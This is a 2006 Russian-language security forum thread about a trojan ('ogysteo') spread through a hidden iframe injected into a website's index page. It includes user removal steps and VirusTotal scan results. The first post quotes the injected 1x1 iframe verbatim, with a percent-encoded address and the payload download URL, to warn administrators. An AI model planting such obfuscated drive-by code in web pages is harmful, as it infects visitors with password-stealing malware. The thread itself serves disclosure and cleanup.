Показано с 1 по 10 из 10.

Trojan-Dropper.Win32.Agent.ays - ogysteo

  1. #1
    Junior Member Репутация
    Регистрация
    25.11.2006
    Сообщений
    6
    Вес репутации
    41

    Trojan-Dropper.Win32.Agent.ays - ogysteo

    Посвящается модераторам, администраторам сайтов, серверов….

    Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
    Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
    <iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
    Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
    http://53server.com/counter1/load.xxx - как видите адрес указан в строке….

    (Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)

    А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:

    Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
    ищем ключ port windows, удаляем его вместе с содержимым 

    после этого перезагружаемся (в обычном режиме)
    Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
    И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..

    P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
    если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….

    Скоро выйдет утилита для излечения от ogysteo…

    Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
    Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
    port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
    - это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
    C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
    Жду Ваших ответов...
    С уважением к обитателям форума Сергей aka tjroot admin@programming-security.ru
    Последний раз редактировалось MOCT; 25.11.2006 в 20:24.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    fdhert
    Guest
    У меня лицензионный Доктор Веб, сегодняшнего обновления, так он не ловит этот вирус ни хрена!!! Позор!!!

    Избавился я сегодня от вируса примерно таким же способом.
    Только вместо лазанья по реестру использую RegCleaner.

    Сначала нажать Ctrl-Alt-Del, убить процесс ogysteo.
    Затем удалить все содержимое папки ...\TEMP. Некоторые файлы не захотят удаляться, убить соответствующие процессы, и все равно удалить все содержимое этой папки.
    Затем удалить сам ogysteo, у меня он был в Windows\System32.
    Перезагрузиться, запустить RegCleaner, снести все лишнее из автозагрузки.

    Перезагрузиться. Запустить RegCleaner.
    Если в автозагрузке осталась лажа, обычно - пустая строка без названия программы, иногда - бред кириллицей или английские слова, повторять в разных вариациях указанные действия до тех пор, пока лажа не исчезнет и не перестанет там появляться. У меня это заняло 3 - 4 попытки.

    Игор Данилов! Срочно делайте обновление!
    У кого этот вирус остался - пришлите его авторам DrWeb, я свои стер.

  4. #3
    Junior Member Репутация
    Регистрация
    25.11.2006
    Сообщений
    6
    Вес репутации
    41
    Наверное у тебя была другая версия данного вируса, потому что то что у меня сидело, оно скрывало свой процесс с помощью перехвата функции ZwQyerySystemInformation (я свою копию все таки изучил...), помимо всего прочего он скрывал и свои файлы, поэтому я начал с реестра, к сожалению сейчас в сети много однотипных троянов которые прячут свои процессы и файлы по сходному механизму, а вот создателям вредоносного кода не под силу спрятать свои творения и в реестре, это связано с тем что в сети 4-5 месяцев назад появились интересные мануалы и исходники по сокрытию процессов, файлов и т.д. Накачали к себе данные исходники всякие ламаки и веселятся....
    Поэтому так много сходных троянов отлавливается. А вообще программистов призываю не кидаться опасными знаниями. Вирусописатели - написание антивирусного ПО - это более благородное дело, если даже учесть всю сложность устройства антивирусного ПО.

    С уважением Сергей admin@programming-security.ru

  5. #4
    Phiolo
    Guest

    Thumbs up Спасибо!

    Спасибо, вируса больше нет! У меня тоже был ключ port windows.

  6. #5
    Junior Member Репутация
    Регистрация
    25.11.2006
    Сообщений
    6
    Вес репутации
    41

    Вам спасибо за благодарности....

    Единственное чего прошу шлите мне новые вирусы.... Которые обнаружили...... admin@programming-security.ru

  7. #6
    чайник
    Guest
    Удалил вручную из System32 и ссылки RegCleaner'om. Прошелся по регистру и вручную удалил все параметры со словосочетанием ogysteo.exе (таких оказалось в разных местах целых 3)

    Нортон со самыми свежими обновлениями (22 ноября) пролопушился. Зато исходящие попытки этого трояна засек Аутпост Файрволл, спасибо ему за это. При загрузке системы с трояном она вываливалась в синий экран, ковырялся тоже в Safe Mode

    PS В темпе учетной записи архива не обнаружил!

  8. #7
    Junior Member Репутация
    Регистрация
    25.11.2006
    Сообщений
    6
    Вес репутации
    41
    http://virusinfo.info/showthread.php?t=6940 в данном разделе форума я описал что делать с подгрузкой фреймов, даже если вы удалили вирус!

  9. #8
    Visiting Helper Репутация
    Регистрация
    03.10.2004
    Сообщений
    699
    Вес репутации
    53
    STATUS: FINISHEDComplete scanning result of "ogysteo.exe", received in VirusTotal at 11.28.2006, 22:00:01 (CET).

    Antivirus Version Update Result
    AntiVir 7.2.0.46 11.28.2006 TR/Proxy.Small.DU.16
    Authentium 4.93.8 11.27.2006 could be infected with an unknown virus
    Avast 4.7.892.0 11.28.2006 no virus found
    AVG 386 11.28.2006 Generic2.KKL
    BitDefender 7.2 11.28.2006 no virus found
    CAT-QuickHeal 8.00 11.28.2006 (Suspicious) - DNAScan
    ClamAV devel-20060426 11.28.2006 no virus found
    DrWeb 4.33 11.28.2006 Trojan.Spambot
    eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm
    eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
    eTrust-Vet 30.3.3219 11.28.2006 no virus found
    Ewido 4.0 11.28.2006 no virus found
    Fortinet 2.82.0.0 11.28.2006 suspicious
    F-Prot 3.16f 11.27.2006 could be infected with an unknown virus
    F-Prot4 4.2.1.29 11.27.2006 generic
    Ikarus 0.2.65.0 11.28.2006 no virus found
    Kaspersky 4.0.2.24 11.28.2006 Trojan-Proxy.Win32.Small.du
    McAfee 4906 11.28.2006 no virus found
    Microsoft 1.1804 11.28.2006 no virus found
    NOD32v2 1887 11.28.2006 probably unknown NewHeur_PE virus
    Norman 5.80.02 11.28.2006 no virus found
    Panda 9.0.0.4 11.28.2006 Suspicious file
    Prevx1 V2 11.28.2006 no virus found
    Sophos 4.11.0 11.16.2006 no virus found
    TheHacker 6.0.3.124 11.27.2006 no virus found
    UNA 1.83 11.28.2006 no virus found
    VBA32 3.11.1 11.28.2006 no virus found
    VirusBuster 4.3.15:9 11.28.2006 no virus found


    STATUS: FINISHEDComplete scanning result of "avz00003.dta", received in VirusTotal at 11.28.2006, 22:00:31 (CET).

    Antivirus Version Update Result
    AntiVir 7.2.0.46 11.28.2006 no virus found
    Authentium 4.93.8 11.27.2006 no virus found
    Avast 4.7.892.0 11.28.2006 no virus found
    AVG 386 11.28.2006 no virus found
    BitDefender 7.2 11.28.2006 no virus found
    CAT-QuickHeal 8.00 11.28.2006 no virus found
    ClamAV devel-20060426 11.28.2006 no virus found
    DrWeb 4.33 11.28.2006 no virus found
    eSafe 7.0.14.0 11.28.2006 suspicious Trojan/Worm
    eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
    eTrust-Vet 30.3.3219 11.28.2006 no virus found
    Ewido 4.0 11.28.2006 no virus found
    Fortinet 2.82.0.0 11.28.2006 suspicious
    F-Prot 3.16f 11.27.2006 no virus found
    F-Prot4 4.2.1.29 11.27.2006 no virus found
    Ikarus 0.2.65.0 11.28.2006 no virus found
    Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t
    McAfee 4906 11.28.2006 no virus found
    Microsoft 1.1804 11.28.2006 no virus found
    NOD32v2 1887 11.28.2006 no virus found
    Norman 5.80.02 11.28.2006 no virus found
    Panda 9.0.0.4 11.28.2006 Suspicious file
    Prevx1 V2 11.28.2006 no virus found
    Sophos 4.11.0 11.16.2006 no virus found
    TheHacker 6.0.3.124 11.27.2006 no virus found
    UNA 1.83 11.28.2006 no virus found
    VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics)
    VirusBuster 4.3.15:9 11.28.2006 no virus found

    STATUS: FINISHEDComplete scanning result of "avz00002.dta", received in VirusTotal at 11.28.2006, 22:01:31 (CET).

    Antivirus Version Update Result
    AntiVir 7.2.0.46 11.28.2006 no virus found
    Authentium 4.93.8 11.27.2006 no virus found
    Avast 4.7.892.0 11.28.2006 Win32:Trojano-CS
    AVG 386 11.28.2006 no virus found
    BitDefender 7.2 11.28.2006 no virus found
    CAT-QuickHeal 8.00 11.28.2006 no virus found
    ClamAV devel-20060426 11.28.2006 no virus found
    DrWeb 4.33 11.28.2006 no virus found
    eSafe 7.0.14.0 11.28.2006 no virus found
    eTrust-InoculateIT 23.73.69 11.28.2006 no virus found
    eTrust-Vet 30.3.3219 11.28.2006 no virus found
    Ewido 4.0 11.28.2006 no virus found
    Fortinet 2.82.0.0 11.28.2006 no virus found
    F-Prot 3.16f 11.27.2006 no virus found
    F-Prot4 4.2.1.29 11.27.2006 no virus found
    Ikarus 0.2.65.0 11.28.2006 no virus found
    Kaspersky 4.0.2.24 11.28.2006 SpamTool.Win32.Agent.t
    McAfee 4906 11.28.2006 no virus found
    Microsoft 1.1804 11.28.2006 no virus found
    NOD32v2 1887 11.28.2006 no virus found
    Norman 5.80.02 11.28.2006 no virus found
    Panda 9.0.0.4 11.28.2006 Suspicious file
    Prevx1 V2 11.28.2006 no virus found
    Sophos 4.11.0 11.16.2006 no virus found
    TheHacker 6.0.3.124 11.27.2006 no virus found
    UNA 1.83 11.28.2006 SpamTool.Win32.Agent.F918
    VBA32 3.11.1 11.28.2006 suspected of Email-Worm.Mydoom.3 (paranoid heuristics)
    VirusBuster 4.3.15:9 11.28.2006 no virus found


    Всего один дурной бит - и гигабайты лежат в маразме.
    Скажи мне свою OS и я скажу тебе КТО ты.

  10. #9
    Junior Member Репутация
    Регистрация
    29.11.2006
    Сообщений
    1
    Вес репутации
    41
    словил такое load.xxx на днях. NOD32 матерился на то, что файл пытается загрузиться, но было непонятно, ставил он перед фактом, что это уже произошло или тока предупреждал, но блокировал загрузку...

    вчера стал перезагружаться комп.
    windows port из реестра снес, но удалить, как я понимаю его приложение не удается. После рестарта в реестре автозапуска программ опять всплывает некий e349349.exe или что-то типа того, запускаемый из локальной директории пользователя.
    Снос темпов IE не помог.
    netstat -a -b показывает открытые сессии к почтовым сервисам hotmail, google, etc.
    Видимо, не до конца гадость убил

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1292
    Тогда выполните правила.

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 30.06.2009, 07:47
  2. Trojan-Dropper.Win32.Agent.clv и ко
    От weallwilldie в разделе Помогите!
    Ответов: 5
    Последнее сообщение: 22.02.2009, 07:52
  3. Trojan-Dropper.Win32.Agent.son
    От izwerg в разделе Помогите!
    Ответов: 10
    Последнее сообщение: 22.02.2009, 06:06
  4. Trojan-Dropper.Win32.Agent.cyl
    От KotRra в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 20.02.2008, 17:12
  5. Trojan-Dropper.Win32.Agent.dxa в ESS+rus
    От enthusiast в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 29.01.2008, 02:10

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01004 seconds with 16 queries